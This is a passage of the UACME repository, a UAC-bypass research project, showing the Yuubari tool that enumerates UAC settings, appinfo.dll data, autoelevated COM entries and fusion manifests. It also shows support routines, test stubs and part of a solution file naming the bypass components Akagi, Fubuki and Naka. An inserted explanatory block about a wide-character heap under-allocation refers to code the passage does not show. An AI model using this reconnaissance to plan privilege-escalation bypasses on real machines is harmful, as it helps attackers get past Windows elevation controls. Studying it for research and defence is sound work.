    LoggerWriteHeader(T_PFDIRFILES_HEAD);

    RtlSecureZeroMemory(szPath, sizeof(szPath));
    if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, (LPWSTR)&szPath))) {
        FusionScanDirectory(szPath, (OUTPUTCALLBACK)FusionOutputCallback);
    }
//#endif
}

/*
 * ListAppInfo
 *
 * Purpose:
 *
 * Scan memory of appinfo.dll.
 *
 */
VOID ListAppInfo(
    VOID
)
{
    WCHAR szFileName[MAX_PATH * 2];

    cuiPrintText(T_APPINFO_HEAD, TRUE);
    LoggerWriteHeader(T_APPINFO_HEAD);

/*#ifndef _DEBUG*/
    _strcpy(szFileName, USER_SHARED_DATA->NtSystemRoot);
    _strcat(szFileName, TEXT("\\system32\\appinfo.dll"));
/*#else
    _strcpy(szFileName, TEXT("C:\\appinfo\\19041.dll"));
#endif*/

    ScanAppInfo(szFileName, (OUTPUTCALLBACK)AppInfoDataOutputCallback);
}

/*
 * main
 *
 * Purpose:
 *
 * Program entry point.
 *
 */
VOID main()
{
    ULONG l = 0;
    WCHAR szBuffer[MAX_PATH + 1];
    RTL_OSVERSIONINFOW osv;

    __security_init_cookie();

    HeapSetInformation(GetProcessHeap(), HeapEnableTerminationOnCorruption, NULL, 0);

    cuiInitialize(FALSE, NULL);
    cuiPrintText(T_PROGRAM_TITLE, TRUE);

    RtlSecureZeroMemory(&osv, sizeof(osv));
    osv.dwOSVersionInfoSize = sizeof(osv);
    RtlGetVersion((RTL_OSVERSIONINFOW*)&osv);
    g_NtBuildNumber = osv.dwBuildNumber;

    if (g_NtBuildNumber < YUUBARI_MIN_SUPPORTED_NT_BUILD) {
        cuiPrintText(TEXT("[UacView] Unsupported Windows version."), TRUE);
        ExitProcess(0);
    }

    if (g_NtBuildNumber > YUUBARI_MAX_SUPPORTED_NT_BUILD) {
        cuiPrintText(TEXT("\r\n[UacView] Not all features available for this build\r\n"), TRUE);
    }

    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 1, (LPWSTR)&szBuffer, MAX_PATH, &l);

    if (_strcmpi(szBuffer, TEXT("/?")) == 0) {
        MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAM_NAME, MB_ICONINFORMATION);
        ExitProcess(0);
    }
    else {
        g_VerboseOutput = (_strcmpi(szBuffer, TEXT("/v")) == 0);
    }

    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    _strcpy(szBuffer, TEXT("uac"));
    ultostr(g_NtBuildNumber, _strend(szBuffer));
    _strcat(szBuffer, TEXT(".log"));

    g_LogFile = LoggerCreate(szBuffer);
    if (g_LogFile != INVALID_HANDLE_VALUE) {
        cuiPrintText(TEXT("Output will be logged to the file"), TRUE);
        cuiPrintText(szBuffer, TRUE);
    }

    ListBasicSettings();
    ListAppInfo();
    ListCOMFromRegistry();
    ListFusion();

    if (g_LogFile != INVALID_HANDLE_VALUE)
        CloseHandle(g_LogFile);

    ExitProcess(0);
}
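The DllRedirection branch of FusionOutputCallback above sizes its log line in characters and hands that count to supHeapAlloc, which counts bytes. The following is an added example, not UACME code, that isolates that class of mistake in portable C: it computes how many bytes a character-count formula allocates versus how many a wide-character line really needs, and beside it a builder that sizes in characters, scales by sizeof(wchar_t) and bounds every append against the capacity it allocated. MAX_PATH_CHARS, the prefix and arrow strings, and the sample key and DLL names are constructed stand-ins for the Windows definitions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Constructed stand-ins for the Windows names used on the page (not UACME code). */
#define MAX_PATH_CHARS 260
static const wchar_t PREFIX[] = L"DllRedirection: ";
static const wchar_t ARROW[] = L" -> ";

/* Bytes that a formula written in characters hands to a byte-counting heap
 * allocator: three character counts added together and passed as if bytes. */
size_t bytes_allocated_by_char_formula(size_t keyChars, size_t dllChars)
{
    return keyChars + dllChars + MAX_PATH_CHARS;
}

/* Bytes the log line really occupies: prefix + key + arrow + dll + terminator,
 * every element a wchar_t. */
size_t bytes_needed(size_t keyChars, size_t dllChars)
{
    return (wcslen(PREFIX) + keyChars + wcslen(ARROW) + dllChars + 1) * sizeof(wchar_t);
}

/* 1 when the character-count formula under-allocates for these lengths. */
int char_formula_overflows(size_t keyChars, size_t dllChars)
{
    return bytes_needed(keyChars, dllChars) > bytes_allocated_by_char_formula(keyChars, dllChars);
}

/* Hardened builder: size in characters, allocate chars * sizeof(wchar_t), and
 * bound every append against that capacity. Returns NULL on any failure;
 * the caller frees the result. */
wchar_t *build_redirect_line(const wchar_t *key, const wchar_t *dll)
{
    if (key == NULL || dll == NULL)
        return NULL;

    size_t keyChars = wcslen(key), dllChars = wcslen(dll);
    if (keyChars == 0 || dllChars == 0)
        return NULL;

    /* Guard the additions before they reach the allocator. */
    size_t limit = SIZE_MAX / sizeof(wchar_t);
    if (keyChars > limit - MAX_PATH_CHARS || dllChars > limit - MAX_PATH_CHARS - keyChars)
        return NULL;

    size_t chars = keyChars + dllChars + MAX_PATH_CHARS;   /* capacity in characters */
    wchar_t *line = calloc(chars, sizeof(wchar_t));        /* byte size = chars * sizeof(wchar_t) */
    if (line == NULL)
        return NULL;

    const wchar_t *parts[] = { PREFIX, key, ARROW, dll };
    size_t used = 0;
    for (size_t i = 0; i < sizeof(parts) / sizeof(parts[0]); i++) {
        size_t n = wcslen(parts[i]);
        if (n >= chars - used) {            /* keep one slot for the terminator */
            free(line);
            return NULL;
        }
        memcpy(line + used, parts[i], n * sizeof(wchar_t));
        used += n;
    }
    line[used] = L'\0';
    return line;
}

/* Build a line and compare it with an expected string; frees the line. */
int redirect_line_matches(const wchar_t *key, const wchar_t *dll, const wchar_t *expected)
{
    wchar_t *line = build_redirect_line(key, dll);
    int ok = (line != NULL && wcscmp(line, expected) == 0);
    free(line);
    return ok;
}

int main(void)
{
    /* Constructed lengths: a long registry key name plus a long DLL path. */
    size_t keyChars = 200, dllChars = 200;
    printf("allocated by char formula: %zu bytes, needed: %zu bytes, under-allocated: %d\n",
           bytes_allocated_by_char_formula(keyChars, dllChars),
           bytes_needed(keyChars, dllChars),
           char_formula_overflows(keyChars, dllChars));

    wchar_t *line = build_redirect_line(L"foo.dll", L"C:\\constructed\\bar.dll");
    if (line != NULL) {
        printf("%ls\n", line);
        free(line);
    }
    return 0;
}
```

On Windows wchar_t is 2 bytes and on most Unix builds 4, so the exact lengths at which the character-count formula starts under-allocating differ, but the direction is the same: the MAX_PATH slack hides the error for short names and a long key plus a long path exhausts it.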
================================================
FILE: Source/Yuubari/sup.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2025
*
*  TITLE:       SUP.C
*
*  VERSION:     1.60
*
*  DATE:        17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

/*
 * supIsCorImageFile
 *
 * Purpose:
 *
 * Return true if image has CliHeader entry, false otherwise.
 *
 */
BOOL supIsCorImageFile(
    _In_ PVOID ImageBase
)
{
    ULONG sz = 0;
    IMAGE_COR20_HEADER* CliHeader;

    CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);

    return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));
}

/*
 * supReadKeyString
 *
 * Purpose:
 *
 * Read string value from registry key.
 *
 */
LPWSTR supReadKeyString(
    _In_ HKEY hKey,
    _In_ LPWSTR KeyValue,
    _In_ PDWORD pdwDataSize
)
{
    LRESULT lRet;
    LPWSTR lpString = NULL;

    if (pdwDataSize == NULL)
        return NULL;

    lRet = RegQueryValueEx(hKey, KeyValue, NULL, NULL, NULL, pdwDataSize);
    if (lRet == ERROR_SUCCESS) {
        lpString = (LPWSTR)supHeapAlloc(*pdwDataSize);
        if (lpString != NULL) {
            lRet = RegQueryValueEx(hKey, KeyValue, NULL, NULL, (LPBYTE)lpString, pdwDataSize);
            if (lRet != ERROR_SUCCESS) {
                supHeapFree(lpString);
                lpString = NULL;
            }
        }
    }
    return lpString;
}

/*
 * supQueryKeyName
 *
 * Purpose:
 *
 * Get key name from handle.
 *
 */
PVOID supQueryKeyName(
    _In_ HKEY hKey,
    _Out_opt_ PSIZE_T ReturnedLength
)
{
    NTSTATUS status;
    ULONG ulen = 0;
    SIZE_T sz = 0;
    PVOID ReturnBuffer = NULL;
    POBJECT_NAME_INFORMATION pObjName = NULL;

    if (ReturnedLength)
        *ReturnedLength = 0;

    NtQueryObject(hKey, ObjectNameInformation, NULL, 0, &ulen);

    pObjName = (POBJECT_NAME_INFORMATION)supHeapAlloc(ulen);
    if (pObjName) {
        status = NtQueryObject(hKey, ObjectNameInformation, pObjName, ulen, NULL);
        if (NT_SUCCESS(status)) {
            if ((pObjName->Name.Buffer != NULL) && (pObjName->Name.Length > 0)) {
                sz = pObjName->Name.Length + sizeof(UNICODE_NULL);
                ReturnBuffer = supHeapAlloc(sz);
                if (ReturnBuffer) {
                    RtlCopyMemory(ReturnBuffer, pObjName->Name.Buffer, pObjName->Name.Length);
                    if (ReturnedLength)
                        *ReturnedLength = sz;
                }
            }
        }
        supHeapFree(pObjName);
    }
    return ReturnBuffer;
}

/*
 * supIsProcess32bit
 *
 * Purpose:
 *
 * Return TRUE if given process is under WOW64, FALSE otherwise.
 *
 */
BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess
)
{
    NTSTATUS status;
    PROCESS_EXTENDED_BASIC_INFORMATION pebi;

    if (hProcess == NULL) {
        return FALSE;
    }

    //query if this is wow64 process
    RtlSecureZeroMemory(&pebi, sizeof(pebi));
    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
    if (NT_SUCCESS(status)) {
        return (pebi.IsWow64Process == 1);
    }
    return FALSE;
}

/*
 * supFindPattern
 *
 * Purpose:
 *
 * Lookup pattern in buffer.
 *
 */
PVOID supFindPattern(
    _In_ CONST PBYTE Buffer,
    _In_ SIZE_T BufferSize,
    _In_ CONST PBYTE Pattern,
    _In_ SIZE_T PatternSize
)
{
    PBYTE p0 = Buffer, pnext;

    if (PatternSize == 0)
        return NULL;
    if (BufferSize < PatternSize)
        return NULL;

    do {
        pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);
        if (pnext == NULL)
            break;

        BufferSize -= (ULONG_PTR)(pnext - p0);

        if (BufferSize < PatternSize)
            return NULL;

        if (memcmp(pnext, Pattern, PatternSize) == 0)
            return pnext;

        p0 = pnext + 1;
        --BufferSize;
    } while (BufferSize > 0);

    return NULL;
}

/*
 * supRegReadDword
 *
 * Purpose:
 *
 * Read DWORD value from given key.
 *
 */
LRESULT supRegReadDword(
    _In_ HKEY hKey,
    _In_ LPWSTR lpValueName,
    _In_ LPDWORD Value
)
{
    LRESULT lResult;
    DWORD dwValue = 0, bytesIO;

    bytesIO = sizeof(DWORD);
    lResult = RegQueryValueEx(hKey, lpValueName, NULL, NULL, (LPBYTE)&dwValue, &bytesIO);
    if (lResult == ERROR_SUCCESS) {
        if (Value)
            *Value = dwValue;
    }
    return lResult;
}

/*
 * supLookupImageSectionByName
 *
 * Purpose:
 *
 * Lookup section pointer and size for section name.
 *
 */
PVOID supLookupImageSectionByName(
    _In_ CHAR* SectionName,
    _In_ ULONG SectionNameLength,
    _In_ PVOID DllBase,
    _Out_ PULONG SectionSize
)
{
    BOOLEAN bFound = FALSE;
    ULONG i;
    PVOID Section;
    IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);
    IMAGE_SECTION_HEADER* SectionTableEntry;

    //
    // Assume failure.
    //
    if (SectionSize)
        *SectionSize = 0;

    if (NtHeaders == NULL)
        return NULL;

    SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +
        sizeof(ULONG) +
        sizeof(IMAGE_FILE_HEADER) +
        NtHeaders->FileHeader.SizeOfOptionalHeader);

    //
    // Locate section.
    //
    i = NtHeaders->FileHeader.NumberOfSections;
    while (i > 0) {

        if (_strncmp_a(
            (CHAR*)SectionTableEntry->Name,
            SectionName,
            SectionNameLength) == 0)
        {
            bFound = TRUE;
            break;
        }

        i -= 1;
        SectionTableEntry += 1;
    }

    //
    // Section not found, abort scan.
    //
    if (!bFound)
        return NULL;

    Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);
    if (SectionSize)
        *SectionSize = SectionTableEntry->Misc.VirtualSize;

    return Section;
}

/*
 * supConcatenatePaths
 *
 * Purpose:
 *
 * Concatenate 2 paths.
 *
 */
BOOL supConcatenatePaths(
    _Inout_ LPWSTR Target,
    _In_ LPCWSTR Path,
    _In_ SIZE_T TargetBufferSize
)
{
    SIZE_T TargetLength, PathLength;
    BOOL NeedSeparator;
    SIZE_T EndingLength;
    SIZE_T i;

    if (Target == NULL || Path == NULL || TargetBufferSize == 0)
        return FALSE;

    // Find current target length.
    TargetLength = 0;
    while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)
        TargetLength++;

    if (TargetLength >= TargetBufferSize)
        return FALSE;

    // Strip trailing backslash from target, but preserve a lone backslash.
    if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\')) {
        // Do not strip if the target is exactly a single backslash.
        if (!(TargetLength == 1 && Target[0] == TEXT('\\'))) {
            TargetLength--;
        }
    }

    // Strip leading backslash from path only if target is non-empty.
    if (TargetLength > 0 && Path[0] == TEXT('\\'))
        Path++;

    // Find path length (after possible stripping).
    PathLength = 0;
    while (Path[PathLength] != 0)
        PathLength++;

    // Determine if a separator is needed based on target's last character.
    NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\'));

    EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;
    if (EndingLength > TargetBufferSize)
        return FALSE;

    // Insert separator if needed.
    if (NeedSeparator) {
        Target[TargetLength] = TEXT('\\');
        TargetLength++;
    }

    // Copy the path.
    for (i = 0; i < PathLength; i++)
        Target[TargetLength + i] = Path[i];

    Target[TargetLength + PathLength] = 0;

    return TRUE;
}

================================================
FILE: Source/Yuubari/sup.h
================================================
#/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2021
*
*  TITLE:       SUP.H
*
*  VERSION:     1.52
*
*  DATE:        23 Nov 2021
*
*  Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

/*
 * supHeapAlloc
 *
 * Purpose:
 *
 * Wrapper for RtlAllocateHeap.
 *
 */
PVOID FORCEINLINE supHeapAlloc(
    _In_ SIZE_T Size)
{
    return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);
}

/*
 * supHeapFree
 *
 * Purpose:
 *
 * Wrapper for RtlFreeHeap.
 *
 */
BOOL FORCEINLINE supHeapFree(
    _In_ PVOID Memory)
{
    return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
}

BOOL supIsCorImageFile(
    _In_ PVOID ImageBase);

LPWSTR supReadKeyString(
    _In_ HKEY hKey,
    _In_ LPWSTR KeyValue,
    _In_ PDWORD pdwDataSize);

PVOID supQueryKeyName(
    _In_ HKEY hKey,
    _Out_opt_ PSIZE_T ReturnedLength);

BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess);

PVOID supFindPattern(
    _In_ CONST PBYTE Buffer,
    _In_ SIZE_T BufferSize,
    _In_ CONST PBYTE Pattern,
    _In_ SIZE_T PatternSize);

LRESULT supRegReadDword(
    _In_ HKEY hKey,
    _In_ LPWSTR lpValueName,
    _In_ LPDWORD Value);

PVOID supLookupImageSectionByName(
    _In_ CHAR* SectionName,
    _In_ ULONG SectionNameLength,
    _In_ PVOID DllBase,
    _Out_ PULONG SectionSize);

BOOL supConcatenatePaths(
    _Inout_ LPWSTR Target,
    _In_ LPCWSTR Path,
    _In_ SIZE_T TargetBufferSize);

================================================
FILE: Source/Yuubari/tests/test_fusion.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2017
*
*  TITLE:       TEST_FUSION.C
*
*  VERSION:     1.21
*
*  DATE:        03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"
#include "fusion.h"

BYTE TestArray[1024 * 32] = { 0 };

VOID TestActivationContext(
    VOID
)
{
}

================================================
FILE: Source/Yuubari/tests/test_fusion.h
================================================
#/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2017
*
*  TITLE:       TEST_FUSION.H
*
*  VERSION:     1.10
*
*  DATE:        20 Feb 2017
*
*  Test unit header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

VOID TestActivationContext(
    VOID
);

================================================
FILE: Source/Yuubari/wintrustex.h
================================================
#pragma once

typedef enum _SIGNATURE_INFO_TYPE {
    SIT_UNKNOWN = 0x0,
    SIT_AUTHENTICODE = 0x1,
    SIT_CATALOG = 0x2
} SIGNATURE_INFO_TYPE;

#define SIF_AUTHENTICODE_SIGNED     0x1
#define SIF_CATALOG_SIGNED          0x2
#define SIF_VERSION_INFO            0x4
#define SIF_CHECK_OS_BINARY         0x800
#define SIF_BASE_VERIFICATION       0x1000
#define SIF_CATALOG_FIRST           0x2000
#define SIF_MOTW                    0x4000

typedef enum _SIGNATURE_STATE {
    SIGNATURE_STATE_UNSIGNED_MISSING = 0x0,
    SIGNATURE_STATE_UNSIGNED_UNSUPPORTED = 0x1,
    SIGNATURE_STATE_UNSIGNED_POLICY = 0x2,
    SIGNATURE_STATE_INVALID_CORRUPT = 0x3,
    SIGNATURE_STATE_INVALID_POLICY = 0x4,
    SIGNATURE_STATE_VALID = 0x5,
    SIGNATURE_STATE_TRUSTED = 0x6,
    SIGNATURE_STATE_UNTRUSTED = 0x7,
} SIGNATURE_STATE;

typedef struct _SIGNATURE_INFO {
    DWORD cbSize;
    SIGNATURE_STATE SignatureState;
    SIGNATURE_INFO_TYPE SignatureType;
    DWORD dwSignatureInfoAvailability;
    DWORD dwInfoAvailability;
    PWSTR pszDisplayName;
    DWORD cchDisplayName;
    PWSTR pszPublisherName;
    DWORD cchPublisherName;
    PWSTR pszMoreInfoURL;
    DWORD cchMoreInfoURL;
    LPBYTE prgbHash;
    DWORD cbHash;
    BOOL fOSBinary; //True if the item is signed as part of an operating system release
} SIGNATURE_INFO, *PSIGNATURE_INFO;

typedef LONG (WINAPI *ptrWTGetSignatureInfo)(
    LPWSTR pszFile,
    HANDLE hFile,
    ULONG sigInfoFlags, //SIF_*
    SIGNATURE_INFO *siginfo,
    VOID *ppCertContext,
    VOID *phWVTStateData
);

================================================
FILE: Source/uacme.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.2.32616.157
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akagi", "Akagi\uacme.vcxproj", "{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Fubuki", "Fubuki\dll.vcxproj", "{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A73-F1A4-44FA-94C0-5CDD84F48717}"
	ProjectSection(SolutionItems) = preProject
		Shared\consts.h = Shared\consts.h
		Shared\libinc.h = Shared\libinc.h
		Shared\shared.h = Shared\shared.h
		Shared\util.c = Shared\util.c
		Shared\util.h = Shared\util.h
		Shared\windefend.c = Shared\windefend.c
		Shared\windefend.h = Shared\windefend.h
	EndProjectSection
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "NanoDesu", "NanoDesu", "{04845492-BD9E-4EC6-ACA4-4A0A460B3508}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Naka", "Naka\Naka.vcxproj", "{3BEF8A16-981F-4C65-8AE7-C612B46BE446}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Yuubari", "Yuubari\Yuubari.vcxproj", "{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akatsuki", "Akatsuki\Akatsuki.vcxproj", "{07EF7652-1C2D-478B-BB4B-F9560695A387}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "minirtl", "minirtl", "{45D748AC-9B16-426E-808D-94662B0417F7}"
	ProjectSection(SolutionItems) = preProject
		Shared\cmdline.c = Shared\cmdline.c
		Shared\minirtl.h = Shared\minirtl.h
		Shared\rtltypes.h = Shared\rtltypes.h
		Shared\strtoul.c = Shared\strtoul.c
		Shared\u64tohex.c = Shared\u64tohex.c
		Shared\_filename.c = Shared\_filename.c
		Shared\_strcat.c = Shared\_strcat.c
		Shared\_strcmp.c = Shared\_strcmp.c
		Shared\_strcmpi.c = Shared\_strcmpi.c
		Shared\_strcpy.c = Shared\_strcpy.c
		Shared\_strend.c = Shared\_strend.c
		Shared\_strlen.c = Shared\_strlen.c
		Shared\_strncmp.c = Shared\_strncmp.c
		shared\_strncmpi.c = shared\_strncmpi.c
		Shared\_strncpy.c = Shared\_strncpy.c
		Shared\_strstri.c = Shared\_strstri.c
	EndProjectSection
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "ntos", "ntos", "{876F1157-B68F-4D0A-B963-6157B266DDE5}"
	ProjectSection(SolutionItems) = preProject
		Shared\ntos\ntbuilds.h = Shared\ntos\ntbuilds.h
		Shared\ntos\ntos.h = Shared\ntos\ntos.h
		Shared\ntos\ntsxs.h = Shared\ntos\ntsxs.h
	EndProjectSection
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Win32 = Debug|Win32
		Debug|x64 = Debug|x64
		DebugConsole|Win32 = DebugConsole|Win32
		DebugConsole|x64 = DebugConsole|x64
		Release|Win32 = Release|Win32
		Release|x64 = Release|x64
		ReleaseInternal|Win32 = ReleaseInternal|Win32
		ReleaseInternal|x64 = ReleaseInternal|x64
		ReleaseInternalConsole|Win32 = ReleaseInternalConsole|Win32
		ReleaseInternalConsole|x64 = ReleaseInternalConsole|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.ActiveCfg = Debug|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.Build.0 = Debug|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.ActiveCfg = Debug|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.Build.0 = Debug|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.ActiveCfg = DebugConsole|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.Build.0 = DebugConsole|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.ActiveCfg = DebugConsole|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.Build.0 = DebugConsole|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.ActiveCfg = Release|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|Win32
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternalConsole|x64
		{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternalConsole|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Debug|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Debug|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.ActiveCfg = Debug|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.Build.0 = Debug|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.ActiveCfg = Debug|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.Build.0 = Debug|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.ActiveCfg = Release|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.Build.0 = Release|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.ActiveCfg = Release|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.Build.0 = Release|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.ActiveCfg = Debug|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.Build.0 = Debug|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.ActiveCfg = Debug|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.ActiveCfg = Debug|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.Build.0 = Debug|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.ActiveCfg = Debug|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.Build.0 = Debug|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
